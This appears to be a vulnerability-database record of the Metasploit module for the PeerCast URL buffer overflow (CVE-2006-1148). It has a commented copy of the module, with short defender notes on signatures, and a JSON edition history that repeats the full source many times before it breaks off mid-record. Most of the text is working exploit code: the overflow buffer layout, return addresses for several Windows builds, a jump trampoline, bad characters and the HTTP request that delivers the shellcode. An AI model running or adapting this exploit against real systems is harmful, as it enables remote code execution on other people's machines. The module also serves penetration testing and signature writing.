ID MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused by a boundary error in the handling of URL parameters.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit remote exploit module for the PeerCast URL-handling stack buffer
# overflow (CVE-2006-1148, PeerCast <= v0.1216).
#
# Defender notes, derived from the code below:
# * The module sends a single HTTP/1.0 GET for "/stream/?" followed by a
#   1024-byte query string; the default remote port registered here is 7144.
# * Apart from the payload, a 4-byte return address and a 5-byte jump, the
#   query string is random alphanumeric filler, so a network signature should
#   key on the path and the oversized query string, not on fixed byte content.
# * Every target entry carries a hard-coded return address tied to specific
#   Windows releases and service packs.
class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata and the default remote port.
  #
  # @param info [Hash] metadata handed in by the framework; merged with the
  #   values defined here through update_info
  def initialize(info = {})
    # Same text as the original %q{} literal, spelled out with explicit newlines.
    description = "\n" \
      "This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n" \
      "The vulnerability is caused due to a boundary error within the\n" \
      "handling of URL parameters.\n"

    references = [
      ['CVE', '2006-1148'],
      ['OSVDB', '23777'],
      ['BID', '17040']
    ]

    payload_constraints = {
      'Space' => 400,
      # NOTE(review): \x0d is listed twice; the duplicate is kept exactly as published.
      'BadChars' => "\x00\x0a\x0d\x20\x0d\x2f\x3d\x3b",
      'StackAdjustment' => -3500
    }

    # One return address per supported Windows build.
    targets = [
      ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],
      ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],
      ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],
      ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }]
    ]

    metadata = {
      'Name' => 'PeerCast URL Handling Buffer Overflow',
      'Description' => description,
      'Author' => ['hdm'],
      'License' => MSF_LICENSE,
      'References' => references,
      'Privileged' => false,
      'Payload' => payload_constraints,
      'Platform' => 'win',
      'Targets' => targets,
      'DisclosureDate' => 'Mar 8 2006'
    }

    super(update_info(info, metadata))

    register_options([Opt::RPORT(7144)])
  end

  # Builds the oversized query string, sends it in one GET request, closes the
  # socket and then hands over to the framework's payload handler.
  def exploit
    connect

    buffer = rand_text_alphanumeric(1024)

    # Selected target's return address, packed as 32-bit little-endian.
    buffer[768, 4] = [target.ret].pack('V')

    # 0xe9 (x86 near jump) with a 32-bit displacement of -517; counted from the
    # end of these five bytes (offset 817) that is offset 300, where the
    # payload is written below.
    buffer[812, 5] = [0xe9, -517].pack('CV')

    shellcode = payload.encoded
    buffer[300, shellcode.length] = shellcode

    request = "GET /stream/?#{buffer} HTTP/1.0\r\n\r\n"

    print_status(format('Trying target address 0x%.8x...', target.ret))
    sock.put(request)
    sock.close

    handler
    disconnect
  end
end
{"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-02-23T07:16:07", "history": [{"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-05-03T20:42:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/http/peercast_url", "reporter": "Rapid7", "references": ["#", "http://www.securityfocus.com/bid/17040", "http://cvedetails.com/cve/cve-2006-1148"], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-07-02T23:17:17", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer 
Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\n\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-07-02T23:17:17", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. 
The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/http/peercast_url", "reporter": "Rapid7", "references": ["#", "http://www.securityfocus.com/bid/17040", "http://cvedetails.com/cve/cve-2006-1148"], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-07-24T19:42:55", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ 
Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-07-24T19:42:55", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-08-21T15:31:45", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The 
vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-08-21T15:31:45", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. 
The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-11-02T09:42:18", "history": [], "viewCount": 1, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, 
-517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-11-02T09:42:18", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-11-02T13:39:34", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2017-11-02T13:39:34"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 
'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-11-02T13:39:34", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. 
The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-12-30T04:06:55", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2017-12-30T04:06:55"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = 
[target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-12-30T04:06:55", "differentElements": ["modified", "published"], "edition": 6}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2017-12-30T15:59:53", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2017-12-30T15:59:53"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error 
within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2017-12-30T15:59:53", "differentElements": ["modified", "published"], "edition": 7}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. 
The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-09T22:05:33", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2018-01-09T22:05:33"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = 
[target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": "2018-01-09T22:05:33", "differentElements": ["modified", "published"], "edition": 8}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/HTTP/PEERCAST_URL", "type": "metasploit", "bulletinFamily": "exploit", "title": "PeerCast URL Handling Buffer Overflow", "description": "This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.", "published": "2006-03-30T21:05:42", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2006-1148"], "lastseen": "2018-01-10T00:02:03", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "modified": "2018-01-10T00:02:03"}}, "objectVersion": "1.4", "metasploitReliability": "Average", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/peercast_url.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'PeerCast URL Handling Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in PeerCast <= v0.1216.\n The vulnerability is caused due to a boundary error 
within the\n handling of URL parameters.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2006-1148'],\n ['OSVDB', '23777'],\n ['BID', '17040']\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 400,\n 'BadChars' => \"\\x00\\x0a\\x0d\\x20\\x0d\\x2f\\x3d\\x3b\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Windows 2000 English SP0-SP4', { 'Ret' => 0x75023360 }],\n ['Windows 2003 English SP0-SP1', { 'Ret' => 0x77d099e3 }],\n ['Windows XP English SP0/SP1', { 'Ret' => 0x77dbfa2c }],\n ['Windows XP English SP0/SP2', { 'Ret' => 0x77dc12b8 }],\n ],\n 'DisclosureDate' => 'Mar 8 2006'))\n\n register_options( [ Opt::RPORT(7144) ])\n end\n\n def exploit\n connect\n\n pat = rand_text_alphanumeric(1024)\n pat[768, 4] = [target.ret].pack('V')\n pat[812, 5] = [0xe9, -517].pack('CV')\n pat[300, payload.encoded.length] = payload.encoded\n\n uri = '/stream/?' + pat\n\n res = \"GET #{uri} HTTP/1.0\\r\\n\\r\\n\"\n\n print_status(\"Trying target address 0x%.8x...\" % target.ret)\n sock.put(res)\n sock.close\n\n handler\n disconnect\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/http/peercast_url.rb"}, "lastseen": 